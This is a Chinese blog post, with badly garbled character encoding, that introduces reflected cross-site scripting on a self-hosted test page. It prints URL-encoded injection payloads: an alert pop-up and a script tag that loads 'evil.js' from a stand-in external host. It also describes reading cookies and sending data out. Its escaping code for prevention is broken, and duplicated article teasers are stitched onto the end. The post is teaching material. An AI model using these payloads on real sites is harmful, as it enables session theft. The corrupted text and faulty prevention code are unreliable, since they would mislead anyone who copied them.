摘要:跨站腳本,稱為這個(gè)術(shù)語用來表示一類的安全問題,指攻擊者向目標(biāo)站點(diǎn)注入標(biāo)簽或者腳本。總結(jié)和注入一樣,屬于小白攻擊法,要說簡單也很簡單,要說難也很難拒絕服務(wù)攻擊如果一個(gè)站點(diǎn)無限彈窗,瀏覽器會(huì)卡死。
xss
跨站腳本,稱為xss這個(gè)術(shù)語用來表示一類的安全問題,指攻擊者向目標(biāo)web站點(diǎn)注入html標(biāo)簽或者腳本。
substring 返回介于兩者之間的字符串,如果省去最后一個(gè)參數(shù),則直接以length為填充window.location.search 返回/后面內(nèi)容包括問號
返回?后面的參數(shù)
window.location.search.substring(1)decodeURIComponent() 將url進(jìn)行解碼,返回解碼后的utf-8格式
這是標(biāo)題
訪問
http://abc.com:8887/?%20word
本地使用web server for chrome 完成了本地靜態(tài)服務(wù)器的搭建,使用host文件,強(qiáng)制修改home.abc.com 以及 abc.com 到 127.0.0.1 完成域名的綁定,因?yàn)閖s腳本不能本地運(yùn)行,因?yàn)橛锌缬虻南拗?/pre>頁面輸出
hello word這是一個(gè)灰常正經(jīng)的頁面。
下面如果嘗試輸入http://abc.com:8887/?%3Cscript%3Ealert("David")%3C/script事實(shí)上現(xiàn)在的瀏覽器很智能了。。已經(jīng)自動(dòng)解析了。已經(jīng)自動(dòng)暫停解析了,最后加上%3e被瀏覽器攔截,自動(dòng)的,去掉以后,由于容錯(cuò)機(jī)制,自動(dòng)生成
好吧,要不是這容錯(cuò)機(jī)制,xss還沒法實(shí)驗(yàn)?zāi)?。無奈,現(xiàn)在太智能了,小白的手法,已經(jīng)不行嘍導(dǎo)致能允許。好吧,去掉自動(dòng)攔截,chrome直接禁止訪問了。╮(╯▽╰)╭
https://developer.mozilla.org...
使用的是預(yù)解析,自動(dòng)平衡樹此時(shí)script變身成為
document.write("hello " +好啦,接著,就會(huì)出現(xiàn)一個(gè)彈窗,David
因?yàn)槭褂眠@個(gè)url自動(dòng)生成一個(gè)另外一個(gè)腳本,由于瀏覽器自動(dòng)的安全措施,所以使用瀏覽器頁面預(yù)解析,寫一個(gè)不平衡的樹,初始瀏覽器解析的時(shí)候自動(dòng)添加上事實(shí)上,現(xiàn)在基本上都會(huì)屏蔽掉的,和sql注入一樣,都是非常小白的攻擊手法。╮(╯▽╰)╭導(dǎo)致出現(xiàn)彈窗,xss完成
接著下面還有
使用src引入一個(gè)腳本。http://abc.com:8887/?%3Cscript%20src=%E2%80%9Chttps://1.com/evil.js%E2%80%9D%3E%3C/script%3E這樣就完成了一次腳本的注入。會(huì)將其他站點(diǎn)的腳本,通過連接進(jìn)行注入。
可以對該站點(diǎn)的內(nèi)容做任何的操作,以及讀取cookie,以及將數(shù)據(jù)發(fā)送回站點(diǎn)事實(shí)上瀏覽器插件就是這樣干的,在頁面中加入js腳本,通過更改頁面的js來達(dá)到對頁面修改的目的更多內(nèi)容 https://www.ibm.com/developer...
預(yù)防通過使用replace()全部替換為實(shí)體即可。
name = name.replace(//g, ">");總結(jié)xss和sql注入一樣,屬于小白攻擊法,要說簡單也很簡單,要說難也很難
拒絕服務(wù)攻擊如果一個(gè)站點(diǎn)無限彈窗,瀏覽器會(huì)卡死。包括使用js挖礦什么的,都不值得一提了。
文章版權(quán)歸作者所有,未經(jīng)允許請勿轉(zhuǎn)載,若此文章存在違規(guī)行為,您可以聯(lián)系管理員刪除。
轉(zhuǎn)載請注明本文地址:http://specialneedsforspecialkids.com/yun/96547.html
摘要:三攻擊分類反射型又稱為非持久性跨站點(diǎn)腳本攻擊,它是最常見的類型的。存儲(chǔ)型又稱為持久型跨站點(diǎn)腳本,它一般發(fā)生在攻擊向量一般指攻擊代碼存儲(chǔ)在網(wǎng)站數(shù)據(jù)庫,當(dāng)一個(gè)頁面被用戶打開的時(shí)候執(zhí)行。例如,當(dāng)錯(cuò)誤,就會(huì)執(zhí)行事件利用跨站。 一、簡介 XSS(cross site script)是指惡意攻擊者利用網(wǎng)站沒有對用戶提交數(shù)據(jù)進(jìn)行轉(zhuǎn)義處理或者過濾不足的缺點(diǎn),進(jìn)而添加一些代碼,嵌入到web頁面中去。使別...
摘要:三攻擊分類反射型又稱為非持久性跨站點(diǎn)腳本攻擊,它是最常見的類型的。存儲(chǔ)型又稱為持久型跨站點(diǎn)腳本,它一般發(fā)生在攻擊向量一般指攻擊代碼存儲(chǔ)在網(wǎng)站數(shù)據(jù)庫,當(dāng)一個(gè)頁面被用戶打開的時(shí)候執(zhí)行。例如,當(dāng)錯(cuò)誤,就會(huì)執(zhí)行事件利用跨站。 一、簡介 XSS(cross site script)是指惡意攻擊者利用網(wǎng)站沒有對用戶提交數(shù)據(jù)進(jìn)行轉(zhuǎn)義處理或者過濾不足的缺點(diǎn),進(jìn)而添加一些代碼,嵌入到web頁面中去。使別...
閱讀 3740·2021-11-24 09:39
閱讀 3471·2019-08-30 15:56
閱讀 1375·2019-08-30 15:55
閱讀 1039·2019-08-30 15:53
閱讀 1926·2019-08-29 18:37
閱讀 3607·2019-08-29 18:32
閱讀 3135·2019-08-29 16:30
閱讀 2936·2019-08-29 15:14